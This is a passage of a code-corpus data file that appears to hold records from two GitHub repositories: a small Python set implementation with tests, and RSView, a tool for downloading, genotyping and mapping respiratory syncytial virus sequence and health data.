3])\n intersect_set = test_set.intersect(Set([1, 2, 4]))\n\n assert intersect_set.equals(Set([1, 2]))\n\n def test_intersect_empty_set(self):\n test_set = Set([1, 2, 3])\n intersect_set = test_set.intersect(Set())\n\n assert intersect_set.equals(Set())\n\n def test_intersect_no_matches(self):\n test_set = Set([1, 2, 3])\n intersect_set = test_set.intersect(Set([4, 5]))\n\n assert intersect_set.equals(Set())\n\n def test_difference(self):\n test_set = Set([1, 2, 3])\n difference_set = test_set.difference(Set([1, 2, 4]))\n\n assert difference_set.equals(Set([3, 4]))\n\n def test_difference_all_matches(self):\n test_set = Set([1, 2, 3])\n difference_set = test_set.difference(Set([1, 2, 3]))\n\n assert difference_set.equals(Set())"
},
{
"alpha_fraction": 0.7431851029396057,
"alphanum_fraction": 0.7431851029396057,
"avg_line_length": 68.69999694824219,
"blob_id": "8cb6d577c43a2d60b978266e8a1a96ad90cbf4fa",
"content_id": "9e80ed7158c04942860d93930ddae8cbf57cb54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 10,
"path": "/README.md",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "# set-python\nWriting a set from scatch in Python\n\nDescription\n=============\nA set is a data structure; it is a collection of items. It can be thought of as like a list; however, unlike a list, items in a set must be unique. If you have a set that consists of 'Jane', 'Janice', and 'John', you cannot append the name 'John' to the set, but you can append the name 'Lucy.'\n\nAdditionally, items in a set are not typically kept in any sort order, so if you put items into a set in some particular order, you cannot rely on being able to acces or retrieve them according to that order.\n\nThe task is to implement a set in Python using Test-Driven Development (TDD), but without using the set data type.\n"
},
{
"alpha_fraction": 0.5542762875556946,
"alphanum_fraction": 0.5542762875556946,
"avg_line_length": 25.071428298950195,
"blob_id": "8bd59f3e0bcabfa1c67dce060042e4f25bd478ef",
"content_id": "40fb6bf45080e95483eb3641b2c9bc09775b6397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1824,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 70,
"path": "/_set.py",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "class Set:\n\n def __init__(self, initial_elements = []):\n self.elements = []\n\n for element in initial_elements:\n if element not in self.elements:\n self.elements.append(element)\n\n def add(self, element):\n if element not in self.elements:\n self.elements.append(element)\n\n def remove(self, element):\n if element in self.elements:\n self.elements.remove(element)\n\n def len(self):\n return len(self.elements)\n\n def contains(self, item):\n if item in self.elements:\n return True\n return False\n\n def equals(self, _set):\n if isinstance(_set, Set) == False:\n return False\n if sorted(self.elements) == sorted(_set.elements):\n return True\n return False\n\n def subset_of(self, _set):\n if isinstance(_set, Set) == False:\n return False\n for element in self.elements:\n if element not in _set.elements:\n return False\n return True\n\n def union(self, _set):\n new_set = Set(self.elements)\n\n for element in _set.elements:\n if element not in self.elements:\n new_set.elements.append(element)\n\n return new_set\n\n def intersect(self, _set):\n new_set = Set()\n\n for element in _set.elements:\n if element in self.elements:\n new_set.elements.append(element)\n\n return new_set\n\n def difference(self, _set):\n new_set = Set()\n\n for element in _set.elements:\n if element not in self.elements:\n new_set.elements.append(element)\n\n for element in self.elements:\n if element not in _set.elements:\n new_set.elements.append(element)\n \n return new_set"
}
] | 3 |
khdusenbury/RSView
|
https://github.com/khdusenbury/RSView
|
3313992a5a036d2d99423b453821249b5e12c23b
|
600a0d313df8a025d7693a09a97b8b4f3c057374
|
759746d81fb3421fbac153da507011d76fb5e71a
|
refs/heads/master
| 2020-04-03T05:13:00.188640 | 2018-12-13T08:26:51 | 2018-12-13T08:26:51 | 155,038,610 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5592977404594421,
"alphanum_fraction": 0.5634181499481201,
"avg_line_length": 41.93846130371094,
"blob_id": "57c8459d7ec1de0b7360be02a14c8a9d56df0fc1",
"content_id": "ffa1266dd0131261171bf90acd2e134278d0253d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5582,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 130,
"path": "/rsview/tests/test_map_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUnittests for map_rsv.py\n\"\"\"\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nimport rsview.map_rsv as map_rsv\n\nclass TestMapRsv(unittest.TestCase):\n \"\"\"\n Tests map_rsv.py\n \"\"\"\n\n def run_organize_data(self, datadir):\n \"\"\"\n Run map_rsv.organize_data function for testing\n \"\"\"\n rsv_df = map_rsv.organize_data(datadir, map_rsv.GENOTYPE_DICT)\n return rsv_df\n\n def run_count_types(self, level, datadir, genotype_level='collapse'):\n \"\"\"\n Run map_rsv.count_types function for testing\n \"\"\"\n organized_df = map_rsv.count_types(self.run_organize_data('data'), map_rsv.JITTER_DICT,\n level, datadir, genotype_level)\n return organized_df\n\n def run_map_rsv(self, level, datadir, genotype_level='collapse', years=[1980, 2018]):\n \"\"\"\n Run map_rsv.map_rsv function for testing\n \"\"\"\n fig = map_rsv.map_rsv(self.run_count_types(level, datadir, genotype_level), level,\n genotype_level, years)\n return fig\n\n def test_organize_data(self):\n \"\"\"\n Test map_rsv.organize_data function\n \"\"\"\n rsv_df = self.run_organize_data('data')\n\n self.assertEqual(list(rsv_df.columns), ['collection_date', 'country', 'subtype',\n 'genotype', 'year', 'genotype_group'])\n self.assertTrue(len(rsv_df[col].notnull()) == len(rsv_df) for col in rsv_df.columns)\n\n def test_count_types(self):\n \"\"\"\n Test map_rsv.count_types function with different arguments\n \"\"\"\n #Test that health data file exists\n self.assertTrue(os.path.isfile('data'+map_rsv.HEALTHFILE))\n #Test that latitude/longitude data file exists\n self.assertTrue(os.path.isfile('data'+'/country_centroids.csv'))\n\n #Test level='subtype'\n organized_df = self.run_count_types('subtype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'year', 'count', 'country_code', 'Longitude',\n 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype'\n organized_df = self.run_count_types('genotype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype_group', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype', genotype_level='all'\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) ==\n len(organized_df) for col in organized_df.columns)\n\n #Don't actually produce plot, just test function components\n @patch(\"rsview.map_rsv.py.plot\")\n def test_map_rsv(self, mock_show):\n \"\"\"\n Test map_rsv.map_rsv function with different arguments\n \"\"\"\n #Test level='subtype'\n fig = self.run_map_rsv('subtype', 'data')\n\n self.assertEqual(len(fig['data']), len(self.run_count_types('subtype', 'data'))+2)\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), (int(2018-1980)+1))\n self.assertTrue('subtype' in fig['data'][0]['hovertext'])\n\n #Test level='subtype', years = 'all'\n fig = self.run_map_rsv('subtype', 'data', years='all')\n year_range = [yr for yr in range(int(self.run_count_types('subtype', 'data').year.min()),\n int(self.run_count_types('subtype', 'data').year.max()))]\n\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), len(year_range))\n\n #Test level='genotype'\n fig = self.run_map_rsv('genotype', 'data')\n organized_df = self.run_count_types('genotype', 'data')\n a_groups = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_groups = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_groups+b_groups))\n self.assertTrue('genotype_group' in fig['data'][0]['hovertext'])\n\n #Test level='genotype', genotype_level='all'\n fig = self.run_map_rsv('genotype', 'data', genotype_level='all')\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_genotypes+b_genotypes))\n self.assertTrue('genotype' in fig['data'][0]['hovertext'])\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.7264458537101746,
"alphanum_fraction": 0.7338252663612366,
"avg_line_length": 50.114036560058594,
"blob_id": "36aeb39cc99bda5477b93ef14b7b2fb9b97c5d73",
"content_id": "947decac5ee7055027d39e74b0508a9578dc5050",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6335,
"license_type": "permissive",
"max_line_length": 1082,
"num_lines": 114,
"path": "/README.md",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": " \n\n## Visualize RSV global distribution and disease severity\n\nAuthors: Kate Dusenbury, Katie Kistler, Jilliane Bruffey\n\nProject for CSE 583. \n\n\n## Background \n\nRespiratory syncytial virus (RSV) is a common respiratory virus that, in healthy adults, usually causes an illness similar to the common cold. However, in infants and the elderly, RSV infection can cause severe disease. RSV is the leading cause of pneumonia in infants less than one year of age and is a leading cause of hospitalization due to acute respiratory tract infections in both infants and young children. \n\nSimilar to other respiratory viruses, such as influenza, RSV circulates globally and with distinct seasonality. RSV generally circulates in the winter months in temperate climates and during the monsoon season in the tropics. Additionally, RSV has two distinct subtypes - A and B - and several genotypes. In any given location, it is generally thought that a single subtype will dominate the RSV season and that the dominant subtype cycles overtime with RSV A seasons giving way to RSV B seasons and vice versa. Furthermore, within each subtype, RSV genotypes appear to replace each other over time. Whether this evolution is due to selection from immune pressure or genetic drift is not fully understood, but RSV does appear to have a distinct pattern of infection over space and time, at least at the local level. A larger analysis of RSV sequencing data to look at patterns of subtype cycling and genotype replacement at a global level is lacking and would be an important resource to better understand the evolution and overarching dynamics of this important respiratory virus. \n\nFurthermore, it is known that for some respiratory viruses, such as rhinovirus, different subtypes or genotypes have different clinical severities. As such, we aim to examine if the subtype and genotype of RSV circulating in a particular location correlates with disease severity as determined by the number of children under 5 years old that die due to acute respiratory tract infection (ARTI). We realize that using deaths due to ARTI in children under 5 is an imperfect estimate of RSV disease burden, but believe this to be an appropriate surrogate due to the high RSV disease burden in this age group. Any large effects of genotype on disease severity should be noticeable with this coarse grain analysis.\n\nTogether our project, ``RSView``, will provide an important resource for better understanding the global circulation dynamics of RSV and investigating the effects of genotype on disease severity. We recognize that this is very much a \"first-pass\" analysis, but believe these analyses and, especially, this framework for examining RSV (which is modeled off of the nextstrain.org platform developed by Trevor Bedford and Richard Neher) could prove quite useful for the field.\n\n\n## Directory Structure\n\n### rsview\nThis directory includes code to download and prepare both the genotype and health data, as well as code to generate functional plots for analyzing the datasets both individually and as an integrated dataset.\n\n- data: includes the raw health data set as well as downloaded RSV genotype data sets\n\n- tests: unittests for the scripts included in RSView\n\n### examples\nThis contains a jupyter notebook with example usage of the code containing in RSView as well as several graphs generated from these datasets\n\n### docs\nThis includes component and functional specifications, including a description of expected use cases. \n\nThe documentation can be rendered into .html format. Follow the instructions in the README.rst rile in the docs directory.\n\n\n## Installation\n\nTo install and run `rsview` perform the following steps:\n\n* clone the repo: git clone https://github.com/khdusenbury/RSView.git\n\n* create and activate the conda environment in the `environment.yml`:\n * `conda env create -f environment.yml`\n * `source activate rsview`\n\n* install `rsview` by running `python setup.py install` within the cloned ``RSView`` directory\n\n* create a plot.ly account [here](https://plot.ly/). Follow [these](https://plot.ly/python/getting-started/#initialization-for-online-plotting) instructions for adding your plot.ly API key to your `~/.plotly/.credentials` file\n\nModules can then be run based on user needs.\n\nTo replicate our analyses:\n\n* run `seq_download.py` with `--query 'human respiratory syncytial virus G'`\n\n* run `genotype.py` \n\n* run `map_rsv.py` and/or `plot_rsv.py` with appropriate arguments.\n\n## Repository structure\n```bash\nRSView/\n├── LICENSE\n├── README.md\n├── docs\n│ ├── ComponentSpecs.md\n│ ├── FunctionalSpecs.md\n│ └── rsview_technology_review.pdf\n├── environment.yml\n├── examples\n│ ├── correlation_year.png\n│ ├── maprsv_2011.png\n│ ├── rsvplot_highlight.png\n│ └── rsvplot_time.png\n├── logo_rsview.png\n├── logo_rsview_small.png\n├── rsview\n│ ├── __init__.py\n│ ├── _metadata.py\n│ ├── data\n│ │ ├── RSVG_all_genotyped.csv\n│ │ ├── RSVG_gb_metadata_0-5000.csv\n│ │ ├── RSVG_gb_metadata_10000-15000.csv\n│ │ ├── RSVG_gb_metadata_15000-20000.csv\n│ │ ├── RSVG_gb_metadata_5000-10000.csv\n│ │ ├── country_centroids.csv\n│ │ ├── health_data_RAW.csv\n│ │ ├── health_data_all.csv\n│ │ ├── health_data_summary.csv\n│ │ └── seqs\n│ │ ├── G_all_aligned.fasta\n│ │ ├── G_long_all_aligned.fasta\n│ │ ├── G_longtyped_aligned.fasta\n│ │ ├── G_seqs_long_nogt.fasta\n│ │ ├── G_seqs_longtyped.fasta\n│ │ └── G_seqs_short.fasta\n│ ├── genotype.py\n│ ├── health_download.py\n│ ├── map_rsv.py\n│ ├── parsearguments.py\n│ ├── plot_correlation.py\n│ ├── plot_rsv.py\n│ ├── rsview_demo.ipynb\n│ ├── seq_download.py\n│ └── tests\n│ ├── __init__.py\n│ ├── test_genotype.py\n│ ├── test_map_rsv.py\n│ └── test_seq_download.py\n└── setup.py\n```\n"
},
{
"alpha_fraction": 0.7563652396202087,
"alphanum_fraction": 0.762071967124939,
"avg_line_length": 67.98484802246094,
"blob_id": "975cadcc93682d820dc6e673dbd42b07af855ff0",
"content_id": "c9932df56826767c5cb5e3370b1e2d57bac6ae72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4556,
"license_type": "permissive",
"max_line_length": 372,
"num_lines": 66,
"path": "/docs/ComponentSpecs.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "=======================\nComponent Specification\n=======================\n\nThe package ``RSView`` analyzes RSV G gene sequences in conjunction with information on the burden of disease (as extrapolated from childhood death rates due to acute respiratory tract infection) in order to better understand global RSV circulation dynamics and the role of RSV subtype on disease severity. In order to carry out the analysis, this package must be able to:\n \n 1. Download RSV G gene sequences and appropriate metadata\n 2. Tabulate this data and organize by genotype, collection date, and country\n 3. Plot this RSV genotype data by location and year (on an interactive map)\n 4. Compare RSV genotype data with disease severity metrics. \n\n\nSoftware Components\n-------------------\n- Argument Parser: `parsearguments.py` will handle user input\n\n- Sequence Downloader: with `seq_download.py`, the user can download the RSV genotype and subtype data from GenBank and process it into a usable format\n\n- Genotype Assigner: `genotype.py` will assign genotypes to RSV G sequences. This program relies on some sequences already being genotyped. It will only add sequences to a genotype that already has a high quality (< 60 gaps in the alignment) sequence in the input data.\n\n- Health Data Processor: `health_download.py` will download and process the data on deaths resulting from acute respiratory infection into a usable dataframe.\n\n- RSV Mapper: `map_rsv.py` will map the global distribution of Respiratory Syncytial Virus (RSV) by collection date, location, and viral subtype or genotype.\n\n- Health Data Plotter: `plot_rsv.py` will plot health metrics from the health data set either using summary data for each country or yearly data for a specified country.\n\n- Health Subtype Plotter: `plot_correlation.py` will integrate the health and RSV datasets and plot health metrics as a function of the relative prevalence of subtypes A and B in that country.\n\nInteractions to Accomplish Use Cases\n------------------------------------\n\n**Use Case 1: Analyze global distribution of RSV genotypes or subtypes**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Sequence Downloader will take arguments from Argument Parser to down load sequence data from GenBank\n 3. Genotype Assigner will take arguments from the Argument Parser and data downloaded by the Sequence Downloader to assign genotypes to sequences and add them to the dataframe.\n 4. RSV Mapper will then take the downloaded sequences from Sequence Downloader and genotypes from Genotype Assigner and plot them on a world map\n\n**Use Case 2 and 3: Analyze health impact of acute respiratory infections around the world**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Health Data Processor will download the health metrics dataset and process it into a usable format\n 3. Health Data Processor will generate interactive graphs for analyzing health data on a global scale or on a country-specific, yearly basis\n\n**Use Case 4: Analyze the correlation between RSV subtype prevalence and health impact**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Sequence Downloader will take arguments from Argument Parser to down load sequence data from GenBank\n 3. Genotype Assigner will take arguments from the Argument Parser and data downloaded by the Sequence Downloader to assign genotypes to sequences and add them to the dataframe.\n 4. Health Data Processor will download the health metrics dataset and process it into a usable format\n 5. Health:Subtype Plotter will integrate the health and sequence datasets and generate interactive graphs for analysis of the relationship between RSV subtype prevalence and health impact in different countries, both on a summary level and as these values change from year to year.\n\nPreliminary Plans\n--------------------\n\n 1. Download RSV G gene sequences and appropriate metadata \n - Tabulate this data and organize by genotype, collection date, and country\n \n 2. Download data on childhood deaths due to pneumonia\n - Tabulate this data and align with RSV G gene sequence dataset via aggregation and/or relabeling, as necessary\n \n 3. Plot the RSV genotype data by location and year\n - Add interactive components to map to enable display of subsets of data (i.e. year, subtype, genotype)\n \n 4. Add disease severity metrics to the interactive map display\n - Compare RSV genotype data with disease severity metrics. \n\n"
},
{
"alpha_fraction": 0.6542056202888489,
"alphanum_fraction": 0.6542056202888489,
"avg_line_length": 32.78947448730469,
"blob_id": "9fc2c0641edeb7d9cf12a923762a4a269d0e9eed",
"content_id": "57fbe97d28198ac6177cd3b576f08898339b9ba0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 642,
"license_type": "permissive",
"max_line_length": 206,
"num_lines": 19,
"path": "/docs/README.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "==============================\nDocumentation for ``RSView``\n==============================\n\nThe documentation is written in `reStructuredText` and can be built via `sphinx`.\n\nBuilding the documentation\n----------------------------\nTo build the documentation, you will need to have installed:\n\n * `sphinx`\n\nThis is included in the `rsview` conda environment.\n\nOnce the environment is properly setup and acitvated, and the `rsview`package has been installed by running `python setup.py install` within the ``RSView`` directory, you can build the documentation with::\n\n make html\n\nThe HTML documentation will then be in ``./_build/html/``.\n"
},
{
"alpha_fraction": 0.38679245114326477,
"alphanum_fraction": 0.38679245114326477,
"avg_line_length": 16.33333396911621,
"blob_id": "be3b6ce5ffde403f9ba930da9e0578b798fcdd71",
"content_id": "daa670a483bce8bcb32c8f0f669f0784da089125",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 6,
"path": "/docs/seq_download.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===================\n``seq_download.py``\n===================\n\n.. automodule:: seq_download\n :members:\n\n\n"
},
{
"alpha_fraction": 0.4051724076271057,
"alphanum_fraction": 0.4051724076271057,
"avg_line_length": 18.33333396911621,
"blob_id": "d8eab4e9a619407ee68e277691898121c419ac30",
"content_id": "68fb4be4248982b6b07f3d2898a1d7507f6114dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 6,
"path": "/docs/health_download.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "======================\n``health_download.py``\n======================\n\n.. automodule:: health_download\n :members:\n"
},
{
"alpha_fraction": 0.5920528173446655,
"alphanum_fraction": 0.6007723212242126,
"avg_line_length": 49.49056625366211,
"blob_id": "d909f2ea1ffa527069178d106a381c1ffa80d1f7",
"content_id": "91857c3c763a2a7f6330ab0e3d530a19939dc8bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8028,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 159,
"path": "/rsview/parsearguments.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Argument parser for `rsview`\"\"\"\n\nimport sys\nimport argparse\n\nfrom argparse import RawTextHelpFormatter\n\nimport rsview\n\nclass ArgumentParserNoArgHelp(argparse.ArgumentParser):\n \"\"\"Like *argparse.ArgumentParser*, but prints help when no arguments.\"\"\"\n def error(self, message):\n \"\"\"Prints error message, then help.\"\"\"\n sys.stderr.write('error: {0}\\n\\n'.format(message))\n self.print_help()\n sys.exit(2)\n\n\ndef map_parser():\n \"\"\"Returns argument parser for `map_rsv.py`\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot global distribution \"\\\n \"of RSV\")\n parser.add_argument('level', type=str, choices=['subtype', 'genotype'],\n help=\"Specify whether the subtype or genotype of RSV sequences \"\\\n \"should be plotted\")\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains seq_download.py output\")\n parser.add_argument('--genotype-level', type=str, choices=['collapse', 'all'],\n default='collapse', help=\"Specify whether to plot all genotypes of \"\\\n \"RSV or collapse them into major clades\")\n parser.add_argument('--years', default=[1990, 2018],\n help=\"Specify a range of years to plot. Example: [1990, 2018]. If 'all'\"\\\n \"is specified, all years for which there are data points will be plotted\")\n return parser\n\ndef seq_parser():\n \"\"\"Returns argument parser for `seq_download.py`.\"\"\"\n parser = ArgumentParserNoArgHelp(\n description='Downloads RSV G protein sequences & metadata from '\\\n 'Genbank. This program is part of {0} (version {1}) written by '\\\n '{2}.'.format(rsview.__name__, rsview.__version__,\n rsview.__author__) + 'For documentation, see {0}'.format(\n rsview.__url__),\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--email', required=True, type=str, help='User email'\\\n ' for GenBank download.')\n parser.add_argument('--query', required=True, type=str, help='Search '\\\n 'term(s) for downloading sequences from GenBank.')\n parser.add_argument('--outdir', required=True, type=str, help='Directory'\\\n 'for downloaded data.')\n parser.add_argument('--outprefix', default='RSVG_gb_metadata', type=str,\n help='Beginning of file name for output `.csv`. Suffix will '\\\n 'specify number of sequences downloaded.')\n parser.add_argument('--db', default='nuccore', type=str, help='Entrez'\\\n ' database to search.')\n parser.add_argument('--firstseq', default=0, type=int, help='Index of '\\\n 'first sequence to download.')\n parser.add_argument('--filesize', default=5000, type=int, help='Number of '\\\n 'seqs to download into one file. Default of 5000 balances '\\\n 'download time and minimizing the number of separate files.')\n parser.add_argument('--maxseqs', default=20000, type=int, help='Maximum '\\\n 'number of sequence hits to search for and download across all '\\\n 'output files.')\n parser.add_argument('--batchsize', default=100, type=int, help='Number '\\\n 'seqs to download in one retrieval. If much larger than 100, '\\\n 'download will be quite slow.')\n parser.add_argument('--filetype', default='gb', type=str, help='File '\\\n 'type of sequences downloaded from GenBank.')\n parser.add_argument('--outmode', default='xml', type=str, help='File '\\\n 'type for results of GenBank query.')\n\n return parser\n\ndef genotype_parser():\n \"\"\"Returns argparser for genotype.py\"\"\"\n parser = ArgumentParserNoArgHelp(\n description='Given RSV G protein sequences & metadata downloaded '\\\n 'from Genbank, fill in missing genotype data. This program is part '\\\n ' of {0} (version {1}) written by {2}.'.format(rsview.__name__,\n rsview.__version__, rsview.__author__) + 'For documentation, see '\n '{0}'.format(rsview.__url__),\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--inprefix', required=True, type=str, help=\"Prefix \"\\\n \"pointing to downloaded sequences and metadata files. --inprefix\"\\\n \" name should be truncated where differences begin between files\"\\\n \" that will be combined into one dataframe. Example: \"\\\n \"'./data/RSVG_gb_metadata'. \")\n parser.add_argument('--seqsdir', required=True, type=str, help=\"Directory\"\\\n \" for outputting generated fasta and alignment files.\")\n parser.add_argument('--outdir', required=True, type=str, help=\"Directory \"\\\n \"for outputting cleaned, genotyped `.csv`.\")\n parser.add_argument('--threshold', type=int, default=150,\n help=\"Threshold for how many sites must match in order to call a\"\\\n \" genotype.\")\n parser.add_argument('--full_length', type=int, default=290, help=\"Min \"\\\n \"length for a sequence to be considered full length.\")\n return parser\n\ndef plot_parser(allowed_data=\"\"):\n \"\"\"Returns argparser for plot_rsv.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n 'level', type=str, choices=['all', 'country'], default='all',\n help=\"Specify whether to plot data for all countries or for a \"\\\n \"specific country\")\n parser.add_argument(\n 'data_type', type=str, choices=['nnd', 'pnd', 'neo9',\n 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9',\n 'fneo9', 'fpost9', 'fufive9'],\n help=\"Specify which category of \"\\\n \"data to plot:\\n\" + allowed_data)\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains\"\n + \" health data and seq_download.py output\")\n parser.add_argument(\n '--country', type=str, default='Global',\n help=\"Specify the country for which to plot data\",\n #required='level' in sys.argv and sys.args.level == \"country\"\n )\n parser.add_argument(\n '--highlight_country', type=str, default=None,\n help=\"Specify the country for to highlight\")\n return parser\n\n\n\ndef correlation_parser(allowed_data=\"\"):\n \"\"\"Returns argparser for plot_correlation.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n 'level', type=str, choices=['all', 'year'], default='all',\n help=\"Specify whether to plot data for all countries or for a \"\\\n \"specific country\")\n parser.add_argument(\n 'data_type', type=str, choices=['nnd', 'pnd', 'neo9',\n 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9',\n 'fneo9', 'fpost9', 'fufive9'],\n help=\"Specify which category of \"\\\n \"data to plot:\\n\" + allowed_data)\n parser.add_argument('datadir',\n type=str,\n help=\"Specify the directory that contains\"\n + \" health data and seq_download.py output\")\n return parser\n\n\n\ndef health_parser():\n \"\"\"Returns argparser for health_download.py\"\"\"\n parser = argparse.ArgumentParser(description=\"Plot data on child death \"\\\n \"rates from acute respiratory infection\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('datadir', type=str,\n help=\"Specify the directory that contains health data\")\n return parser\n"
},
{
"alpha_fraction": 0.5554781556129456,
"alphanum_fraction": 0.5654665231704712,
"avg_line_length": 44.31578826904297,
"blob_id": "62c42137bc671694b2083b8ae25b0c9140b557eb",
"content_id": "366b40bf24706d3f41902f4cd3c602f3172fedca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12915,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 285,
"path": "/rsview/map_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" Map the global distribution of Respiratory Syncytial Virus (RSV) by collection date, location,\nand viral subtype or genotype \"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport plotly.plotly as py\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\nimport rsview.parsearguments\n\n\nJITTER_DICT = {'A':1.0, 'B':-1.0}\nHEALTHFILE = '/health_data_all.csv'\nGENOTYPE_DICT = {'GA2':'GA', 'GA5':'GA', 'GB12':'GB', 'GB13':'GB', 'GA3':'GA', 'NA1':'NA',\n 'NA2':'NA', 'ON1':'ON', 'SAA1':'SAA', 'BA':'BA', 'BA10':'BA', 'BA9':'BA',\n 'GB3':'GB', 'SAB1':'SAB', 'SAB3':'SAB', 'SAB4':'SAB', 'NA3':'NA', 'GB2':'GB',\n 'BA11':'BA', 'BA7':'BA', 'GA7':'GA', 'BA 10':'BA', 'BA 12':'BA', 'BA 14':'BA',\n 'BA 2':'BA', 'BA 8':'BA', 'BA 9':'BA', 'SAA2':'SAA', 'BA8':'BA', 'GA1':'GA',\n 'BA4':'BA', 'BA5':'BA', 'BA12':'BA', 'GB1':'GB', 'BA08':'BA', 'BA09':'BA',\n 'BA IV':'BA', 'THB':'TH', 'GA6':'GA', 'GB4':'GB'}\n\ndef organize_data(datadir, genotype_dict):\n \"\"\"\n Load .csv files containing RSV sequence data and extract relevant columns. Ensure country\n names to conform to standard names used to retrieve latitude and longitude data. Return a\n DataFrame where each sequence is row containing country, genotype, subtype, and collection date\n information.\n \"\"\"\n\n #Find datafiles in user-specified directory\n filename = str(datadir)+'/RSVG_all_genotyped.csv'\n #Return error if data file is not present\n\n if os.path.isfile(filename):\n pass\n else:\n raise ValueError('Sequence data has not been downloaded yet. Run seq_download.py')\n\n #Append relevant columns from all data files to DataFrame\n\n rsv_df = pd.read_csv(filename, usecols=['collection_date', 'country', 'subtype',\n 'genotype'], parse_dates=['collection_date'])\n\n rsv_df['year'] = rsv_df['collection_date'].apply(lambda x: x.year)\n rsv_df['genotype'] = rsv_df.genotype.str.replace(' ', '') #Get rid of whitespaces\n\n #Add column to group genotypes by clade\n rsv_df = rsv_df.assign(genotype_group=rsv_df['genotype'].map(genotype_dict))\n\n #Fix specific country names where city is given\n countries_with_cities = ['Brazil', 'China', 'Russia', 'New Zealand', 'Spain', 'Kenya',\n 'Germany', 'Egypt', 'India', 'Japan', 'Canada', 'Italy',\n 'Malaysia', 'Jordan', 'Saudi Arabia', 'Myanmar', 'Netherlands',\n 'France', 'Peru']\n for con in countries_with_cities:\n rsv_df['country'] = np.where(rsv_df['country'].str.contains(con), con, rsv_df['country'])\n\n #Fix specific country names where lat/lon table uses alternate country name\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('USA'), 'United States',\n rsv_df['country'])\n 